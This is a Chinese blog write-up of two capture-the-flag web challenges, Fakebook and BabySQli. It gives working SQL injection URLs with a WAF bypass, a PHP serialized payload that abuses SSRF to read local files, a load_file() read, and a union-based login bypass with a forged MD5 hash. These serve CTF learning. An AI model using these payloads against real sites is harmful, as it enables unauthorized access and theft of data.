2021-01-25

最新推荐文章于 2024-07-22 00:15:00 发布
最新推荐文章于 2024-07-22 00:15:00 发布
阅读量583 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/113137941
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

[网鼎杯 2018]Fakebook

SSRF

SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请求到与它相连但与外网隔离的内部系统。

一般由curl的滥用引起
详情见SSRF介绍

file协议__读取本地文件

file协议更多的是将该请求视为一个本地资源访问请求,和你使用资源管理器打开是一样的,是纯粹的请求本地文件。

–http请求方式则是通过假架设一个web服务器,解析http协议的请求然后向浏览器返回资源信息。我们所开发的html文件最后必定是会以网页的形式部署在服务器上,通过http协议访问,所以我们开发中也尽可能模拟线上环境,架设本地服务器,来避免file协议与http协议实现

robots.txt__源码泄露

  • 很多网站都会有这个文件,比如说百度、谷歌都有,直接访问/robots.txt 就行
  • 作用是告诉搜索引擎该网站可以访问的范围。

登录一个账号测试
在这里插入图片描述可以看到admin可以打开,打开后发现url里面有参数no,尝试注入:
order by 5时报错,可以判断字段数为4。
view.php?no=1 order by 4--+
过滤了unionselect 绕过waf,改为 union/**/select 后成功绕过,发现注入点为2

view.php?no=1 union/**/select 1,2,3,4--+
数据库为:fakebook
/view.php?no=0 union/**/select 1,database(),3,4--+
表为:users
/view.php?no=0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+
列名为:no,username,passwd,data
/view.php?no=0%20union/**/select%201,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'--+
查出数据
/view.php?no=0%20union/**/select%201,group_concat(no,'-',username,'-',passwd,'-',data),3,4 from fakebook.users --+

/view.php?no=0%20union/**/select%201,group_concat(no,'-',username,'-',passwd,'-',data),3,4 from fakebook.users --+

在这里插入图片描述读取内容发现字段 data 有一组序列化后的字符串,其它字段也没什么内容。此时注意到,这就是我们刚刚注册填的内容

注入到此结束,没有得到flag

robots.txt__源码泄露
访问/user.php.bak 下载了一个文件,去除后缀名.bak得到user.php,源码泄露

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

get函数:将我们输入的blog,调用get函数创建链接我们填的url,将访问该url返回的内容在页面输出。

get方法里有curl函数

curl_init:初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。
curl_setopt:为 cURL 会话句柄设置选项。
curl_exec:执行给定的 cURL 会话。
curl_getinfo:获取最后一次传输的相关信息。

利用ssrf漏洞

php序列化
由上面的data字段内容可以得知,我们的注册信息,是以反序列化字符串储存的。
以序列化的方式存储在data字段中,查询时返回序列化字符串后先进行反序列化后再提取blog网址。
那如果让它查询返回的是包含file:///var/www/html/flag.php的序列化字符串,那它提取时就是访问了flag.php文件并返回。解决了上面注册的过滤。
所以,我们先构造一个php序列化字符串

  • 注册界面输入的blog经过了isValidBlog()函数的过滤,不然直接在注册界面输入file:///var/www/html/flag.php就能拿到flag。
  • isValid 函数:返回页面验证控件的状态。如果全部验证通过,IsValid属性为true,可以提交。当前页面中任何一个验证控件没通过验证,IsValid属性为false,不可以提交。
  • get()函数存在ssrf漏洞。

构造一个php,序列化字符串

<?php

class UserInfo
{
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";
	
}

$a = new UserInfo();
echo serialize($a);
?>

得到
O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
再一次sql联合注入,返回查询内容为file:///var/www/html/flag.php
/view.php?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
查看源码,访问链接得到flag,再加个base64.

在这里插入图片描述非预期解
因为没有禁用load_file()函数,所以可以直接利用该函数拿到flag。绕了半天结果简单一步就出来了
/view.php?no=0 union/**/select 1,load_file('/var/www/html/flag.php'),3,4

[GXYCTF2019]BabySQli

1. base32和base64的区别?

  1. base32是全部由大写字母和数字构成,或者其结尾有三个等号
  2. base64则是由大小写字母和数字一起构成

2. 联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据,于是可对认证过程进行了绕过

bp抓包fuzz
在这里插入图片描述
导入字典在这里插入图片描述
经测试过滤了or order =等字符,但是没有过滤union select,可以通过select猜有多少字段
查看源代码中有一串数字
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
通过base32解码为
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
再通过base64解码
select * from user where username = ‘$name’

提示我们:在用户名处,通过联合注入,写入登入需要的信息,以达到登录成功。(因为这里是错误回显,不能直接查数据库)
如:构造playload:
name=1' union select 0,'admin','81dc9bdb52d04dc20036dbd8313ed055'%23&pw=1234
于是我们构造了一个数据库里不存在的虚拟身份和密码,然后登入进去

经验:后端的密码一般都是经过md5存储的,因此密码判断往往和md5有关系

再输入用户名admin 密码随便填,回显的是wrong pass!,说明admin是存在的,
输入1’ union select 1,‘admin’,3#
回显的是wrong pass!可以判断账户名再第二个字段
最后:
构造playload:
账号:1’ union select 1,‘admin’,‘81dc9bdb52d04dc20036dbd8313ed055’#
密码:1234

无尽星河-深空
关注
专栏目录
class_narwhal:2021-01-25全栈Python Day班
02-13
从1/25/2021开始的PDX Code Guild Python Full Stack全日制课程的回购 课程时间为2021年1月25日至2021年5月7日,上午9:30 –下午4:30 假期 职员 梅里特·劳伦森(Merritt Lawrenson),讲师 皮特·琼斯(TA) 封顶...
关于编程语言的选择的问题的讨论-2021-01-25(B).pdf
01-25
标题和描述中提到的主要知识点是关于编程语言的选择,特别是针对不同年龄段和目标群体的编程学习路径。主要讨论了Scratch、C++、Python这三种语言,并提到了CSP-J、CSP-S这两个计算机科学竞赛。...
Web通信知识-file协议
kiku
03-03 3869
什么是协议 协议,网络协议的简称,网络协议是通信计算机双方必须共同遵从的一组约定。如怎么样建立连接、怎么样互相识别等。只有遵守这个约定,计算机之间才能相互通信交流。它的三要素是:语法、语义、时序。 为了使数据在网络上从源到达目的,网络通信的参与方必须遵循相同的规则,这套规则称为协议(protocol),它最终体现为在网络上传输的数据包的格式。 协议往往分成几个层次进行定义,分层定义是为了使某一层协...
curlfile扩展 php_PHP的cURL扩展库使用详解
weixin_28721917的博客
12-23 590
在还没有接触curl的时候,相信大家在获取网页内容的时,使用得最多的一个函数就是:file_get_contents(),但是它的可控制性不够灵活,无法处理错误情况,对于各种复杂情况的采集更是显得有点无能为力。因此,本文将为你介绍另外一种工具:cURL的使用方法,在后面也还会给出相关的几个案例,这些都是你使用file_get_contents()无法做到的。一、cURL库的介绍为了更好的理解下面的...
通过File类型来读文件
最新发布
xjdkxnhcoskxbco的博客
07-22 251
我们可以调用FileInputStream构造方法传入File。可以通过exists()判断该文件是否存在。=null)可以减少报错。File类————表示一个文件的类。我们可以传入文件路径创建该类对象。
file】关于file协议
michaelwoshi的博客
03-02 5769
英文原义:File Protocol 中文释义:本地文件传输协议 注解:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 应用:要使用File协议,基本的格式如下:file:///文件路径,比如要打开D盘images文件夹中的pic.gif文件,那么可以在资源管理器或IE地址栏中键入:file:///D:/images/pic.gif ...
php curl file,PHP curl_file_create函数
weixin_31968831的博客
03-10 555
(PHP 5 >= 5.5.0)curl_file_create — 创建一个 CURLFile 对象。说明CURLFile curl_file_create ( string $filename [, string $mimetype [, string $postname ]] )创建一个 CURLFile 对象, 用与上传文件。参数filename上传文件的路径mimetype文件的M...
PHP cURL库函数抓取页面内容
热门推荐
Thunder的博客
05-24 1万+
cURL 是一个利用URL语法规定来传输文件和数据的工具,支持很多协议和选项,如HTTP、FTP、TELNET等,能提供 URL 请求相关的各种细节信息。最爽的是,PHP 也支持 cURL 库。 本文将介绍 cURL 的一些高级特性,以及在 PHP 中如何运用它。 1 为什么要用cURL? 是的,我们可以通过其他办法获取网页内容。大多数时候,我因为想偷懒,都直接用简单的 PH
BvSshClient-Inst__8.46.exe(2021-01-25)
01-25
Bitvise SSH Client是款window上不错的免费的ssh客户端,支持SFTP, tunneling, terminal, FTP­to­SFTP bridge。除了支持比较重要的动态端口转发外,还支持多帐号登录、图形界面的SFTP、远程桌面等。...
第6章 函数和递归(C++版) 第二节 递归算法-2021-01-25(B).pdf
01-25
在编程领域,递归是一种强大的解决问题的方法,尤其在C++这样的高级编程语言中。递归的概念基于函数调用自身的能力,这种自引用的过程可以解决一些复杂的问题,将它们分解为更小、更易于处理的部分。...
法语考试学词典2021---01--25.rar
09-11
《法语考试学词典2021---01--25》是一款专注于法语考试学习的工具,它集合了丰富的词汇和语法知识,旨在帮助考生更好地准备各类法语考试,如DELF、DALF、TCF等。该资源以文档形式呈现,详细梳理了从2021年1月到25日...
学会CRUL一文足矣-curl详解
星哥说事
05-17 5646
什么是curl cURL是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具,但按传统,习惯称cURL为下载工具。 你可以把 CURL 想象成一个精简的命令行网页浏览器。它支持几乎你能想到的所有协议,可以交互访问几乎所有在线内容。唯一和浏览器不同的是,cURL 不会渲染接收到的相应信息。curl和wget类似也支持上传下载等感觉比wget更强大,但我觉得用途方面更偏重于模拟网络请求,而下载方面我更喜欢用wget,curl的用法也和wget类似! cU
File文件读写操作
weixin_43389824的博客
05-07 4011
C语言实现,FILE文件读写操作
文件包含漏洞相关协议详解
永远是少年
12-13 2526
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
php curl获取文件内容,PHP 获取远程文件内容curl函数用法
weixin_29199873的博客
03-19 444
PHP 获取远程文件内容curl函数用法发布于 2014-11-02 14:14:16 | 144 次阅读 | 评论: 0 | 来源: 网友投递PHP开源脚本语言PHP(外文名: Hypertext Preprocessor,中文名:“超文本预处理器”)是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,入门门槛较低,易于学习,使用广泛,主要适用于Web开发领域。PHP的文件后缀名...
File协议
保持初心 保持好奇
12-22 7436
1.file协议 中文意思:本地文件传输协议 什么是FileFile协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 如何使用File:要使用File协议,基本的格式如下:file:///文件路径,比如要打开F盘flash文件夹中的1.swf文件,那么可以在资源管理器或浏览器地址栏中输入:file:///f:/flash/1.swf回车。 2.uri中为什么本地文件file后面跟三个斜杠, http等协议跟两个斜杠?
File协议和Http协议
顺其自然~专栏
04-14 866
http访问本地的html文件,相当于将本机作为了一台http服务器,然后通过主机访问的是你自己电脑上的本地服务器,再通过http服务器去访问你本机的文件资源。http协议工作于客户端-服务器架构上,浏览器作为http客户端通过url向http服务器端发送请求,服务器接收到请求后,向客户端发送请求。file协议只能在本地访问,file无法实现跨域,file协议对应有一个类似http的远程访问,就是ftp协议,即文件传输协议。如果有主机,前面是要加 // 的,因此对于 http等这些网络地址是。
关于new URL()
Haines
01-16 743
关于new URL()
ssrf总结
weixin_44576725的博客
05-01 1958
SSRF总结 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。SSRF可以对外网、服务器所在内网、本地进行端口扫描,攻击运行在内网或本地的应用,或者利用File协议读取本地文件。 原理 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从
使用python中的pymsql完成如下:表结构与数据创建 1. 建立 `users` 表和 `orders` 表。 `users` 表有用户ID、用户名、年龄字段,(id,name,age) `orders` 表有订单ID、订单日期、订单金额,用户id字段。(id,order_date,amount,user_id) 2 两表的id作为主键,`orders` 表用户id为users的外键 3 插入数据 `users` (1, '张三', 18), (2, '李四', 20), (3, '王五', 22), (4, '赵六', 25), (5, '钱七', 28); `orders` (1, '2021-09-01', 500, 1), (2, '2021-09-02', 1000, 2), (3, '2021-09-03', 600, 3), (4, '2021-09-04', 800, 4), (5, '2021-09-05', 1500, 5), (6, '2021-09-06', 1200, 3), (7, '2021-09-07', 2000, 1), (8, '2021-09-08', 300, 2), (9, '2021-09-09', 700, 5), (10, '2021-09-10', 900, 4); 查询语句 1. 查询订单总金额 2. 查询所有用户的平均年龄,并将结果四舍五入保留两位小数。 3. 查询订单总数最多的用户的姓名和订单总数。 4. 查询所有不重复的年龄。 5. 查询订单日期在2021年9月1日至9月4日之间的订单总金额。 6. 查询年龄不大于25岁的用户的订单数量,并按照降序排序。 7. 查询订单总金额排名前3的用户的姓名和订单总金额。 8. 查询订单总金额最大的用户的姓名和订单总金额。 9. 查询订单总金额最小的用户的姓名和订单总金额。 10. 查询所有名字中含有“李”的用户,按照名字升序排序。 11. 查询所有年龄大于20岁的用户,按照年龄降序排序,并只显示前5条记录。 12. 查询每个用户的订单数量和订单总金额,并按照总金额降序排序。
06-03
cur.execute('SELECT SUM(amount) FROM orders WHERE order_date BETWEEN "2021-09-01" AND "2021-09-04"') print(cur.fetchone()[0]) # 6. 查询年龄不大于25岁的用户的订单数量,并按照降序排序。 cur.execute('''...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值